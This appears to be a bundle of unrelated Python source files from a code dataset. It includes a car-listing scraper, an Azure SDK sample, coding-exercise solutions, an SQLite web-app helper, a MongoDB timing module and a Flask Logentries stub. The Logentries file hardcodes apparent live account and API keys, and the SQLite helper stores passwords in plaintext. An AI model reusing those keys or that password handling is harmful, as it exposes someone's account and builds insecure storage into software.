findModel(soup):\r\n\tmodelL=[]\r\n\tmodels=soup.find_all('a','clean_a_tyle')\r\n\tfor model in models:\r\n\t\tmodelL.append(model.text.replace(' ',';',1)+';')\r\n\treturn modelL\r\n\r\ndef findInfo(soup):\r\n\tinfoL=[]\r\n\tinfos=soup.find_all('div','info_area_time')\r\n\tfor info in infos:\r\n\t\ttemp=info.find_all('p')\r\n\t\tinfoL.append(temp[1].text.replace('出廠','')+';'+temp[0].text.replace(' c.c.','.cc')+';')\r\n\treturn infoL\r\n\r\ndef findCities(soup):\r\n\tcityL=[]\r\n\tcities=soup.find_all('p','title_city')\r\n\tfor city in 
cities:\r\n\t\tcityL.append(city.text+';')\r\n\treturn cityL\r\n\r\ndef findPrice(soup):\r\n\tpriceL=[]\r\n\tprices=soup.find_all('div','info_area_year')\r\n\tfor price in prices:\r\n\t\tpriceL.append(price.text)\r\n\treturn priceL\r\n\r\ndef multiTa(temp):\r\n\turl=f'https://usedcar.u-car.com.tw/index.aspx?page={temp}'\r\n\r\n\tsoup=BeautifulSoup(fetch(url),'html.parser')\r\n\tinfoL=findInfo(soup)\r\n\tmodelL=findModel(soup)\r\n\tcityL=findCities(soup)\r\n\tpriceL=findPrice(soup)\r\n\tfileT=open(f\"temp/temp{temp}.txt\",\"w\",encoding=\"utf-8\")\r\n\tfor i in range(len(infoL)):\r\n\t\tif priceL[i] != '面議':\r\n\t\t\tfileT.write(modelL[i]+infoL[i]+cityL[i]+priceL[i]+'\\n')\r\n\r\ndef mergeN(count):\r\n\tfileT=open(f\"src/src.txt\",\"w\",encoding=\"utf-8\")\r\n\tfor i in range(1,count+1):\r\n\t\tfileA=open(f\"temp/temp{i}.txt\",\"r\",encoding=\"utf-8\")\r\n\t\tfileT.write(fileA.read())\r\n\t\tfileA.close()\r\n\t\tos.remove(f'temp/temp{i}.txt')\r\n\t\r\n\tfileT.close()\t\r\n\r\nif __name__ == '__main__':\r\n\tif(not os.path.exists('src')):\t\r\n\t\tos.mkdir('src')\r\n\tif(not os.path.exists('temp')):\t\r\n\t\tos.mkdir('temp')\r\n\tpgNum=253\r\n\tpool = multiprocessing.Pool()\r\n\tpool.map(multiTa, range(1,pgNum+1))\r\n\tpool.close()\r\n\tmergeN(pgNum)\r\n#Mitsubishi;FORTIS;2015;1798.cc;桃園市;35.8萬\r\n","sub_path":"carCr2.py","file_name":"carCr2.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"273824897","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for license information.\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is regenerated.\n# --------------------------------------------------------------------------\n\nfrom azure.identity import DefaultAzureCredential\nfrom azure.mgmt.storageimportexport import StorageImportExport\n\n\"\"\"\n# PREREQUISITES\n pip install azure-identity\n pip install azure-mgmt-storageimportexport\n# USAGE\n python create_export_job.py\n\n Before run the sample, please set the values of the client ID, tenant ID and client secret\n of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,\n AZURE_CLIENT_SECRET. For more info about how to get the value, please see:\n https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal\n\"\"\"\n\n\ndef main():\n client = StorageImportExport(\n credential=DefaultAzureCredential(),\n subscription_id=\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\n )\n\n response = client.jobs.create(\n job_name=\"myExportJob\",\n resource_group_name=\"myResourceGroup\",\n body={\n \"location\": \"West US\",\n \"properties\": {\n \"backupDriveManifest\": True,\n \"diagnosticsPath\": \"waimportexport\",\n \"export\": {\"blobList\": {\"blobPathPrefix\": [\"/\"]}},\n \"jobType\": \"Export\",\n \"logLevel\": \"Verbose\",\n \"returnAddress\": {\n \"city\": \"Redmond\",\n \"countryOrRegion\": \"USA\",\n \"email\": \"Test@contoso.com\",\n \"phone\": \"4250000000\",\n \"postalCode\": \"98007\",\n \"recipientName\": \"Test\",\n \"stateOrProvince\": \"wa\",\n \"streetAddress1\": \"Street1\",\n \"streetAddress2\": \"street2\",\n },\n \"returnShipping\": {\"carrierAccountNumber\": \"989ffff\", \"carrierName\": \"FedEx\"},\n \"storageAccountId\": \"/subscriptions/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/resourceGroups/myResourceGroup/providers/Microsoft.ClassicStorage/storageAccounts/test\",\n },\n },\n )\n 
print(response)\n\n\n# x-ms-original-file: specification/storageimportexport/resource-manager/Microsoft.ImportExport/preview/2021-01-01/examples/CreateExportJob.json\nif __name__ == \"__main__\":\n main()\n","sub_path":"sdk/storage/azure-mgmt-storageimportexport/generated_samples/create_export_job.py","file_name":"create_export_job.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"461576756","text":"class Solution:\n def stringMatching(self, words: List[str]) -> List[str]:\n res = []\n words = sorted(words, key=len)\n for i, w in enumerate(words):\n for ot in words[i + 1:]:\n if w in ot:\n res.append(w)\n break\n return res\n","sub_path":"code/easy/string-matching-in-an-array.py","file_name":"string-matching-in-an-array.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"209649747","text":"import os\r\nimport cat_service\r\nimport subprocess\r\nimport platform\r\n\r\ndef main():\r\n '''\r\n Main method of project. 
It execute all other methods.\r\n :return:\r\n '''\r\n\r\n print_header()\r\n folder = get_output_folder()\r\n print('Found or created folder: ' + folder)\r\n download_cats(folder)\r\n display_cats(folder)\r\n\r\ndef print_header():\r\n\r\n print('==================================')\r\n print(' LOL cat app')\r\n print('==================================')\r\n\r\n\r\ndef get_output_folder():\r\n '''\r\n This method create a folder for .jpg files.\r\n :return: Path to folder.\r\n '''\r\n\r\n base_folder = os.path.dirname(__file__)\r\n folder = 'cat_pictures'\r\n full_path = os.path.join(base_folder, folder)\r\n\r\n if not os.path.exists(full_path) or not os.path.isdir(full_path):\r\n print('Creating new directory at {}'.format(full_path))\r\n os.mkdir(full_path)\r\n\r\n return full_path\r\n\r\n\r\ndef download_cats(folder):\r\n '''\r\n This method use 'cat_service' module to download .jpg files from website.\r\n :param folder: Path to the folder in which files will be stored.\r\n '''\r\n\r\n cat_counter = 8\r\n print('Contacting server to download cats...')\r\n\r\n for cat in range(1, cat_counter + 1):\r\n\r\n name = 'LOLcat number: {}'.format(cat)\r\n print('Downloading ' + name)\r\n cat_service.get_cat(folder, '')\r\n\r\n print('Done!')\r\n\r\n\r\ndef display_cats(folder):\r\n '''\r\n This method display .jpg files on all popular systems.\r\n :param folder: Path to folder with files.\r\n '''\r\n if platform.system() == 'Darwin':\r\n subprocess.call(['open', folder])\r\n elif platform.system() == 'Windows':\r\n subprocess.call(['start', folder])\r\n elif platform.system() == 'Linux':\r\n print('Displaying cats in OSX window.')\r\n subprocess.call(['xdg-open', folder])\r\n else:\r\n print(\"Sorry, We don't support your os: \" + platform.system())\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} 
+{"seq_id":"126459233","text":"# -*- coding:utf-8 -*-\n\nimport time\nfrom multiprocessing import Process\n\nargs = (1, 2, 3)\n\n\ndef func():\n time.sleep(5)\n for i in args:\n print(i)\n\n\np = Process()\np.start()\n# p.join()\ntime.sleep(0.1)\n\nprint('5555')","sub_path":"系统编程/002-multiprocessing.py","file_name":"002-multiprocessing.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"201303816","text":"import sqlite3\nfrom flask import g, jsonify\nimport unicodedata\n\ndef connect_db():\n return sqlite3.connect(\"database.db\")\n\ndef get_db():\n db = getattr(g, 'db', None)\n if db is None:\n db = g.db = connect_db()\n return db\n\ndef register_user(firstname, familyname, email, passw, gender, city, country):\n try:\n c = get_db()\n result = c.execute(\"insert into registered_users (firstname, familyname, email, password, gender, city, country, pageviews) values (?,?,?,?,?,?,?,0)\", [firstname,familyname,email,passw,gender,city,country])\n c.commit()\n return True\n except:\n return False\n\ndef login_user(email, password, token):\n c = get_db()\n result = c.execute(\"select * from registered_users where (email) = (?) 
AND (password) = (?)\", [email, password])\n result = result.fetchone()\n\n result2 = c.execute(\"select * from logged_in_users where (email) = (?)\", [email])\n #result2 = result2.fetchone()\n if (result is not None):\n c.execute(\"insert into logged_in_users (email, token) values (?,?)\", [email,token])\n c.commit()\n return True\n else:\n return False\n\ndef logout_user(token, email):\n c = get_db()\n stored_token = get_token(email)\n if (token == stored_token):\n c.execute(\"delete from logged_in_users where (token) = (?)\", [token])\n c.commit()\n return True\n else:\n return False\n\ndef get_token(email):\n try:\n c = get_db()\n print(\"asasdsadas har??\")\n result2 = c.execute(\"select token from logged_in_users where (email) = (?)\", [email])\n #result = c.execute(\"select token from logged_in_users WHERE (token) = (?)\", [token])\n result = result2.fetchone()[0]\n c.commit()\n return result\n except:\n return False\n\ndef delete_user(email):\n try:\n c = get_db()\n result = c.execute(\"delete from registered_users where (email) = (?)\", [email])\n c.commit()\n return True\n except:\n return False\n\ndef user_logged_in(token):\n try:\n c = get_db()\n result = c.execute(\"select * from logged_in_users where (token) = (?)\", [token])\n result = result.fetchone()[0]\n c.commit()\n\n if (result == None):\n return False\n return True\n except:\n return False\n\ndef token_to_email(token):\n try:\n c = get_db()\n result = c.execute(\"select * from logged_in_users where (token) = (?)\", [token])\n result = result.fetchone()[0]\n c.commit()\n\n if (result == None):\n return False\n return result\n except:\n return False\n\ndef user_exists(email):\n try:\n c = get_db()\n result = c.execute(\"select * from registered_users where (email) = (?)\", [email])\n result = result.fetchone()[0]\n c.commit()\n if (result == None):\n return False\n return True\n except:\n return False\n\ndef get_user_data(email):\n try:\n c = get_db()\n result = c.execute(\"select * from 
registered_users where (email) = (?)\", [email])\n result = result.fetchone()\n c.commit()\n if (result is not None):\n result = {\"firstname\" : result[0], \"familyname\" : result[1], \"email\" : result[2], \"gender\" : result[4], \"city\" : result[5], \"country\" : result[6], \"pageviews\" : result[7]}\n return result\n result = {}\n return result\n except:\n result = {}\n return result\n\ndef get_user_password(email):\n try:\n c = get_db()\n result = c.execute(\"select password from registered_users where (email) = (?)\", [email])\n result = result.fetchone()\n c.commit()\n if (result is not None):\n result = result[0]\n return result\n result = {}\n return result\n except:\n result = {}\n return result\n\ndef set_user_password(password, email):\n try:\n c = get_db()\n c.execute(\"update registered_users set password = (?) where email = (?)\", [password, email])\n c.commit()\n return True\n except:\n return False\n\ndef get_messages_by_email(token, email):\n try:\n c = get_db()\n rows = c.execute(\"select message, sender from messages where (email) = (?)\", [email])\n rows = rows.fetchall()\n\n result = []\n for row in range(len(rows)):\n message = \"\".join(rows[row][0])\n sender = \"\".join(rows[row][1])\n data = {'writer' : sender, 'content' : message}\n result.append(data)\n\n return result\n except:\n return False\n\ndef alter_table(command_string, parameter_array):\n try:\n c = get_db()\n result = c.execute(command_string, parameter_array)\n c.commit()\n return True\n except:\n return False\n\ndef post_message(email, sender, message):\n try:\n c = get_db()\n result = c.execute(\"INSERT INTO messages VALUES(?, ?, ?)\", [email, sender, message])\n c.commit()\n return True\n except:\n return False\n\ndef query_db(query, args=(), one=False):\n cur = get_db().execute(query, args)\n rv = cur.fetchall()\n cur.close()\n return (rv[0] if rv else None) if one else rv\n\ndef close_db():\n db = getattr(g, 'db', None)\n if db is not None:\n get_db().close()\n\ndef 
add_view(email):\n try:\n c = get_db()\n result = c.execute(\"UPDATE registered_users SET pageviews = pageviews + 1 WHERE (email) = (?)\", [email])\n c.commit()\n return True\n except:\n return False\n\ndef number_of_logged_in():\n try:\n c = get_db()\n result = c.execute(\"SELECT COUNT(*) FROM logged_in_users\")\n result2 = result.fetchone()\n return result2[0]\n except:\n return False\n\ndef number_of_messages():\n try:\n c = get_db()\n result = c.execute(\"SELECT COUNT(*) FROM messages\")\n result2 = result.fetchone()\n return result2[0]\n except:\n return False\n","sub_path":"Twidder/database_helper.py","file_name":"database_helper.py","file_ext":"py","file_size_in_byte":6016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"73299190","text":"\"\"\" Q 1.1: Test if a string has all unique characters. What if you can't use additional data structures? \"\"\"\n\n\"\"\" A: Using another data structure allows me to do this in O(N) time. 
I can sort the characters and check the adjacent characters to do this in O(N logN time)\"\"\"\n\ndef hasUniq(theInput):\n print (\"the Input is: \", theInput)\n sortedChars = ''.join(sorted(theInput))\n\n for i in xrange(len(sortedChars) - 1):\n if sortedChars[i] == sortedChars[i + 1]:\n print (\"the answer for this is false\")\n return False\n\n print (\"the answer for this is true\")\n return True\n\n# hasUniq(\"amitabh\")\n# hasUniq(\"amit\")\n# hasUniq(\"\")\n\n\"\"\" Feedback: This is good, given the constraint that you cannot use additional data structures.\nThe BEST way to do this is to use a FIXED SIZE ARRAY of size 256 (ascii alphabet size), and increment counters accordingly \"\"\"\n\n########################################################################################################################################\n\n\"\"\" Q 1.2 : Write a method to determine if one string is a permutation of another \"\"\"\n\"\"\" My Approach: decompose string into character array. If they consist of the same SET of characters, then it is true \"\"\"\ndef isPerm(in1, in2):\n print (\"our inputs are: \", in1, in2)\n if len(in1) != len(in2):\n print (\"the answer is false\")\n return False\n\n charSet = [0] * 26\n for i in xrange(len(in1)):\n char = in1[i]\n index = ord(char) - 97\n charSet[index] += 1\n for i in xrange(len(in2)):\n char = in2[i]\n index = ord(char) - 97\n charSet[index] = charSet[index] - 1\n if charSet[index] < 0:\n print (\"the answer is False\")\n return False\n print (\"the answer is true\")\n return True\n # subtract 97 from each character to get the required position in the array\n#print ord('a')\n\n#isPerm(\"abcdefg\", \"bacdgfe\")\n\n################################################################\n\n\"\"\"Q 1.5: One away - To edit a string, you can insert, remove, or replace a characterv\"\"\"\n\n\"\"\" First make sure the strings are <= 1 character length away from each other. 
Then loop through the shorter string and\ndelete whichever character is different from the longer string.\nOnce the strings are of the same length, change one character that's different and compare whether the lists are the same.\nIf yes, return true and if not return false\n\"\"\"\n\ndef isOneAway(str1, str2):\n print(\"the inputs are: \", str1, str2)\n if abs(len(str1) - len(str2)) > 1:\n print (\"one string is at least 2 chars greater than the other\")\n return False\n in1 = list(str1)\n in2 = list(str2)\n\n if( len(in1) < len(in2) ):\n for i in xrange(len(in1)):\n if in1[i] != in2[i]:\n in2.pop(i)\n break\n elif( len(in2) < len(in1) ):\n #print (in2, \" is shorter than \", in1)\n for i in xrange(len(in2)):\n if in1[i] != in2[i]:\n in1.pop(i)\n #print in1\n #print in2\n break\n\n # remove the last character if the character lengths are not the same\n if len(in1) > len(in2):\n in1.pop()\n if len(in2) > len(in1):\n in2.pop()\n # now the lists should be of the same length\n for i in xrange(len(in1)):\n if in1[i] != in2[i]:\n in2[i] = in1[i]\n break\n in1.sort()\n in2.sort()\n print (in1 == in2)\n return in1 == in2\n\nisOneAway(\"pale\", \"ple\") # should return true (remove a)\nisOneAway(\"pales\", \"pale\") # true\nisOneAway(\"pale\", \"bale\") # true\nisOneAway(\"pale\", \"bake\") # false\n####################################################\n\n\"\"\" Q 1.6: Compress aabcccccaaa to a2b1c5a3. 
If the compressed string is longer, return the original string \"\"\"\n\ndef stringCompress(theInput):\n if len(theInput) == 0:\n return None\n count = 0\n currentChar = theInput[0]\n answer = \"\"\n for character in theInput:\n if (character == currentChar):\n count += 1\n else:\n answer = answer + str(currentChar) + str(count)\n currentChar = character\n count = 1\n answer = answer + str(currentChar) + str(count)\n if len(answer) <= len(theInput):\n print (answer)\n return answer\n print (theInput)\n return theInput\n\n# stringCompress(\"aabcccccaaa\")\n\n##########################################################\n","sub_path":"Chapter1.py","file_name":"Chapter1.py","file_ext":"py","file_size_in_byte":4435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"263183875","text":"# Anja Mühr\n# Aug 2019\n\nimport math\nfrom SequenceList import SequenceList\n\n\nclass SequenceClassifier:\n\n def __init__(self, csvFile):\n \"\"\" constructor \"\"\"\n self.csvFile = csvFile\n self.odds = SequenceList('odds.csv')\n self.evens = SequenceList('evens.csv')\n self.fibs = SequenceList('fibs.csv')\n self.nats = SequenceList('nats.csv')\n self.errors = SequenceList('errors.csv')\n\n def run(self):\n \"\"\" Opens csv file, reads line by line, classifying each line, then saves lists of each sequence to csv. 
\"\"\"\n\n file = open(self.csvFile, 'r')\n\n # read file line by line\n line = file.readline()\n while line:\n # remove \\n and blank spaces at end of line\n line = line.rstrip()\n # separate into numbers list if line is not empty\n if (line != \"\"):\n linearr = line.split(',')\n # classify sequence\n self.classify_sequence(linearr)\n line = file.readline()\n\n file.close()\n\n # save results to csv\n self.odds.toFile()\n self.evens.toFile()\n self.fibs.toFile()\n self.nats.toFile()\n self.errors.toFile()\n\n def is_int(self, no):\n \"\"\" checks if a string is an integer \"\"\"\n try:\n int(no)\n return True\n except ValueError:\n return False\n\n def is_odd_even(self,odd_even, linearr):\n \"\"\" check if a sequence is odd or even => parameter oddEven must be 0 for even and 1 for odd \"\"\"\n prev = 0\n count = 0\n for current in linearr:\n # check if current is an integer (necessary for valid sequence)\n if (not self.is_int(current)):\n return False\n current = int(current)\n # check if number is odd/even (oddEven = 0 for even and 1 for odd)\n if (current % 2 != odd_even):\n # return false if not\n return False\n if (count > 0):\n # check if odd/even numbers are in sequence\n if (prev + 2 != current):\n # return false if not\n return False\n prev = current\n count = count +1\n # if false has not been returned after checking seq, must be true\n return True\n\n def is_nat(self,linearr):\n \"\"\" checks if a sequence is of natural numbers \"\"\"\n prev = 0\n count = 0\n for current in linearr:\n # check if current is an integer (necessary for valid sequence)\n if (not self.is_int(current)):\n return False\n current = int(current)\n if (count > 0):\n # check if numbers are in sequence\n if (prev + 1 != current):\n # return false if not\n return False\n prev = current\n count = count+1\n # if false has not been returned after checking seq, must be true\n return True\n\n def is_fib(self,linearr):\n \"\"\" Check if a sequence belongs to fibanacci seq starting with 
1,1,2,3,5,8.... \"\"\"\n\n def is_fib_no(no):\n \"\"\" A number belongs to the fibonacci sequence if (5*n^2 + 4) or (5*n^2 – 4) is a perfect square \"\"\"\n # https://en.wikipedia.org/wiki/Fibonacci_number#Sequence_properties\n\n def perfect_square(no):\n \"\"\" checks if a number is a perfect square \"\"\"\n if (no < 0):\n return False\n test = int(math.sqrt(no))\n return test*test == no\n\n return perfect_square((5*no*no + 4)) or perfect_square((5*no*no - 4))\n\n prev = 0\n prevprev = 0\n count = 0\n\n for current in linearr:\n # check if current is an integer (necessary for valid sequence)\n if (not self.is_int(current)):\n return False\n current = int(current)\n # check if first 2 numbers belong to fib Sequence\n if (count < 2):\n #p = 1\n if (not is_fib_no(current)):\n # if not, return false\n return False\n else:\n # check fib requirement\n if (prevprev + prev != current):\n # return false if untrue\n return False\n prevprev = prev\n prev = current\n count = count+1\n # if false has not been returned after checking seq, must be true\n return True\n\n def classify_sequence(self,linearr):\n \"\"\" classifies a sequence as fibonacci, odd, even or natural, or as an error \"\"\"\n\n # check if fibonacci sequence\n if (self.is_fib(linearr)):\n # fibonacci sequence, thus save to fibs object\n self.fibs.add(linearr)\n\n # check if even sequence\n elif (self.is_odd_even(0, linearr)):\n # even sequence, thus save to evens object\n self.evens.add(linearr)\n\n # check if odd sequence\n elif (self.is_odd_even(1, linearr)):\n # odd sequence, thus save to odds object\n self.odds.add(linearr)\n\n # check if natural sequence\n elif (self.is_nat(linearr)):\n # natural sequence, thus save to nats object\n self.nats.add(linearr)\n\n # if none of these, incorrect input so save in error object\n else:\n 
self.errors.add(linearr)\n","sub_path":"SequenceClassifier.py","file_name":"SequenceClassifier.py","file_ext":"py","file_size_in_byte":5513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"139432275","text":"\"\"\"\n database.py\n Contains interactions for the HP Norton Mongodb database.\n\n Functionality:\n HP Norton customer: see a list of all products available for rent\n HP Norton salesperson: see a list of all of the different products, showing product ID,\n description, product type and quantity available.\n HP Norton salesperson: see a list of the names and contact details\n (address, phone number and email) of all customers who have rented a certain product.\n\n Includes timing functionality to all methods\n\"\"\"\nimport logging\nimport csv\nimport time\nfrom pymongo import MongoClient\n\n# File logging setup\nLOG_FILE = 'HP.log'\nFILE_LOG_FORMAT = \"%(asctime)s %(filename)s:%(lineno)-4d %(levelname)s %(message)s\"\nFILE_FORMATTER = logging.Formatter(FILE_LOG_FORMAT)\nFILE_HANDLER = logging.FileHandler(LOG_FILE, mode=\"w\")\nFILE_HANDLER.setLevel(logging.INFO)\nFILE_HANDLER.setFormatter(FILE_FORMATTER)\n\n# Console logging setup\nCONSOLE_LOG_FORMAT = \"%(filename)s:%(lineno)-4d %(message)s\"\nCONSOLE_FORMATTER = logging.Formatter(CONSOLE_LOG_FORMAT)\nCONSOLE_HANDLER = logging.StreamHandler()\nCONSOLE_HANDLER.setLevel(logging.DEBUG)\nCONSOLE_HANDLER.setFormatter(CONSOLE_FORMATTER)\n\nLOGGER = logging.getLogger()\nLOGGER.setLevel(logging.ERROR)\nLOGGER.addHandler(FILE_HANDLER)\nLOGGER.addHandler(CONSOLE_HANDLER)\n\n\nclass TimeMeta(type):\n \"\"\"Metaclass to enable timing of functions\"\"\"\n @staticmethod\n def time_factory(func):\n def time_func(*args, **kwargs):\n start = time.time()\n output = func(*args, **kwargs)\n end = time.time() - start\n print('Time to run {}: {}\\n'.format(func.__name__, end))\n return output\n return time_func\n\n def __new__(cls, clsname, bases, _dict):\n time_functions = 
{}\n for name, val in _dict.items():\n if not name.startswith('__'):\n time_functions[name + '_timeing'] = TimeMeta.time_factory(val)\n time_functions[name] = val\n else:\n time_functions[name] = val\n\n return super().__new__(cls, clsname, bases, time_functions)\n\n\nclass MongoDBConnection():\n \"\"\"MongoDB Connection\"\"\"\n\n def __init__(self, host='127.0.0.1', port=27017):\n \"\"\" be sure to use the ip address not name for local windows\"\"\"\n self.host = host\n self.port = port\n self.connection = None\n\n def __enter__(self):\n self.connection = MongoClient(self.host, self.port)\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.connection.close()\n\n\nclass MongoDBFunctions(metaclass=TimeMeta):\n\n def import_data(self, directory_name, product_file, customer_file, rentals_file):\n \"\"\"\n This function takes a directory name three csv files as input, one with product data, one with\n customer data and the third one with rentals data and creates and populates a new MongoDB\n database with these data. 
It returns 2 tuples: the first with a record count of the number of\n products, customers and rentals added (in that order), the second with a count of any errors\n that occurred, in the same order.\n\n :return: tuple1, record count of the # of products, customers, rentals added\n tuple2, count of any errors that occurred, in the same order\n \"\"\"\n logging.info('--------Importing datafiles in %s', directory_name)\n count_list = []\n error_list = []\n files = (product_file, customer_file, rentals_file)\n\n # Open connection\n logging.info('Opening connection to mongodb.')\n mongo = MongoDBConnection()\n logging.info('Connection open.')\n\n with mongo:\n # Create connection to database\n logging.info('Attempting to connect to mongodb: HPNortonDatabase in local')\n hp_db = mongo.connection.HPNortonDatabase\n logging.info('Connected HPNortonDatabase.')\n\n # create/connect to collections\n logging.info('Connecting to collections...')\n product_data = hp_db['product_data']\n logging.info('*connected to collection: product_data')\n customer_data = hp_db['customer_data']\n logging.info('*connected to collection: customer_data')\n rental_data = hp_db['rental_data']\n logging.info('*connected to collection: rental_data')\n collections = (product_data, customer_data, rental_data)\n\n # load data\n for file, collection in zip(files, collections):\n logging.info('Attempting to open: %s', file)\n with open(directory_name + '/' + file) as curr_f:\n logging.info('File opened.')\n reader = csv.DictReader(curr_f)\n logging.debug('Created reader to process file.')\n data = []\n for row in reader:\n logging.debug('Adding to data list %s', row)\n data.append(row)\n logging.debug('Data added to list.')\n\n try:\n collection.insert_many(data)\n count_list.append(data.__len__())\n logging.info('File data loaded.')\n except TypeError as error: # may need to figure out how to accommodate more errors...\n logging.info('Error %s: ', error)\n error_list.append(error)\n\n 
logging.info('--------All data import complete.')\n # Outputs\n tuple1 = tuple(count_list)\n tuple2 = tuple(error_list)\n\n return tuple1, tuple2\n\n def show_available_products(self):\n \"\"\"\n Returns a Python dictionary of products listed as available with the following fields:\n product_id\n description\n product_type\n quantity_available\n \"\"\"\n\n # Open connection\n logging.info('--------Showing available products in HPNortonDatabase')\n logging.info('Opening connection to mongodb.')\n mongo = MongoDBConnection()\n logging.info('Connection open.')\n\n output_dict = {}\n\n with mongo:\n # Create connection to database\n logging.info('Attempting to connect to mongodb: HPNortonDatabase in local')\n hp_db = mongo.connection.HPNortonDatabase\n logging.info('Connected HPNortonDatabase.')\n\n # Query database\n logging.debug('Attempting to connect to collection: product_data')\n products = hp_db['product_data']\n logging.debug('Connected to collection.')\n\n logging.info('Querying product collection and adding products to output_dict.')\n for product in products.find():\n logging.debug('Adding product to output_dict: %s', product['product_id'])\n prod_str = f\"prod{product['product_id']}\"\n product.pop('_id')\n output_dict[prod_str] = product\n logging.debug('Product added.')\n logging.info('Output dictionary created.')\n\n return output_dict\n\n def show_rentals(self, product_id):\n \"\"\"\n Returns a Python dictionary with the following user information from users that have rented\n products matching product_id:\n user_id\n name\n address\n phone_number\n email\n \"\"\"\n # Open connection\n logging.info('--------Searching HPNortonDatabase for rentals of product: %s', product_id)\n logging.info('Opening connection to mongodb.')\n mongo = MongoDBConnection()\n logging.info('Connection open.')\n\n output_dict = {}\n\n with mongo:\n # Create connection to database\n logging.info('Attempting to connect to mongodb: HPNortonDatabase in local')\n hp_db = 
mongo.connection.HPNortonDatabase\n logging.info('Connected HPNortonDatabase.')\n\n rental_data = hp_db['rental_data']\n customer_data = hp_db['customer_data']\n\n for rental in rental_data.find({'product_id': product_id}):\n rental_str = f\"rental_{rental['rental_id']}\"\n customer = customer_data.find_one({'customer_id': rental['customer_id']})\n customer.pop('_id')\n output_dict[rental_str] = customer\n\n return output_dict\n\n\ndef main():\n \"\"\"Used for testing purposes.\"\"\"\n directory_path = 'C:/Users/USer/Documents/UW_Python_Certificate/Course_2/' \\\n 'SP_Python220B_2019/students/franjaku/lesson10/data_files'\n mongo_funcs = MongoDBFunctions()\n with open('timings.txt', 'w+') as fl:\n fl.write('-----------------------------\\n')\n fl.write('With 4 records per file.\\n')\n mongo_funcs.import_data_timeing(directory_path, 'product_data.csv', 'customer_data.csv',\n 'rental_data.csv')\n output_rentals = mongo_funcs.show_rentals_timeing('1')\n fl.write('Number of rentals found: {}\\n'.format(len(output_rentals)))\n output_products = mongo_funcs.show_available_products_timeing()\n fl.write('Number of products found: {}\\n'.format(len(output_products)))\n\n fl.write('-----------------------------')\n fl.write('With 100 records per file.\\n')\n mongo_funcs.import_data_timeing(directory_path, 'product_data_100.csv', 'customer_data_100.csv',\n 'rental_data_100.csv')\n output_rentals = mongo_funcs.show_rentals_timeing('1')\n fl.write('Number of rentals found: {}\\n'.format(len(output_rentals)))\n output_products = mongo_funcs.show_available_products_timeing()\n fl.write('Number of products found: {}\\n'.format(len(output_products)))\n\n fl.write('-----------------------------')\n fl.write('With 10000 rental records.\\n')\n mongo_funcs.import_data_timeing(directory_path, 'product_data_100.csv', 'customer_data_100.csv',\n 'rental_data_10000.csv')\n output_rentals = mongo_funcs.show_rentals_timeing('1')\n fl.write('Number of rentals found: 
{}\\n'.format(len(output_rentals)))\n output_products = mongo_funcs.show_available_products_timeing()\n fl.write('Number of products found: {}\\n'.format(len(output_products)))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"students/franjaku/lesson10/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":10462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"517244480","text":"import json\nimport os\nfrom logentriesAPI import api as api\n\nfrom flask import Flask, render_template, request\n\n# Flask app should start in global layout\napp = Flask(__name__)\n\n\n@app.route('/logentries', methods=['POST'])\ndef logentries():\n req = request.get_json(silent=True, force=True)\n\n print(\"Request:\")\n print(json.dumps(req, indent=4))\n\n return req\n\n\n@app.route('/logentries', methods=['GET'])\ndef logentries_get_logs():\n # req = request.get_json(silent=True, force=True)\n\n # print(\"Request:\")\n\n api.ACCOUNT_KEY = \"f03c6814-64e7-4183-8d30-08034a6cee97\"\n api.API_KEY = \"0e57d0ea-5e8e-4955-922a-ee6e2dbd9a76\"\n\n api.get_logs()\n #\n # FROM_TS = datetime.date(2017, 10, 26)\n # TO_TS = datetime.date(2017, 10, 27)\n #\n # #a = datetime.datetime.strftime(FROM_TS, \"DD.%MM.%YY\")\n #\n # api.HOST_NAME = \"portal-prod\"\n #\n # api.SAVE_FILE = \"result\"\n #\n # api.LOGENTRIES_API_URL\n #\n # # api.do_search(FROM_TS, TO_TS)\n #\n # # Read/Write\n # # --api-key e4bececc-d1b4-449e-a949-2b6b7c5e0074\n # # Read Only\n # # --api-key 0e57d0ea-5e8e-4955-922a-ee6e2dbd9a76\n #\n # # --account-key f03c6814-64e7-4183-8d30-08034a6cee97\n # # --from-date 26.11.2017\n # # --to-date 27.11.2017\n # # --host-name portal-prod\n #\n # return \"

Patrick

